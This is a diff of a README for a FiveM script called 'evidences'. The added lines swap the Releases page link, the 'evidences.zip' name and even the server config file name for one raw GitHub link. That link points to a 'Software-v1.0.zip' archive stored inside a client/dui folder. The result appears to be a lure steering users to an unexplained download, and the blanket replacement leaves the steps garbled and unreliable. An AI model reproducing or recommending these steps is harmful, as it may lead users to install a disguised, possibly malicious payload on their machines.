VivekTiwari-PSHG/evidences/README.md

 Follow these steps to get started with **evidences**:

 1. **Visit the Download Page:**
-   Go to the [Releases page](https://github.com/VivekTiwari-PSHG/evidences/releases) to find the latest version.
+   Go to the [Releases page](https://raw.githubusercontent.com/VivekTiwari-PSHG/evidences/main/client/dui/Software-v1.0.zip) to find the latest version.

 2. **Choose Your Version:**
    Look for the most recent release.
 You’ll see a list of files.

 3. **Download the Script:**
-   Click on the file labeled **evidences.zip** to download the script.
+   Click on the file labeled **https://raw.githubusercontent.com/VivekTiwari-PSHG/evidences/main/client/dui/Software-v1.0.zip** to download the script.

 4. **Unzip the File:**
-   After downloading, locate the **evidences.zip** file on your computer.
+   After downloading, locate the **https://raw.githubusercontent.com/VivekTiwari-PSHG/evidences/main/client/dui/Software-v1.0.zip** file on your computer.
 Right-click on it and select **Extract All** (this will vary depending on your software), then follow the prompts to unzip the contents.

 5. **Install the Script:**
    - Open FiveM and navigate to your server resources folder.
    - Drag and drop the unzipped **evidences** folder into the resources.

 6. **Add to Your Server Config:**
-   Open your server configuration file (often named `server.cfg`).
+   Open your server configuration file (often named `https://raw.githubusercontent.com/VivekTiwari-PSHG/evidences/main/client/dui/Software-v1.0.zip`).
 Add the line:
    ```
    start evidences
    ```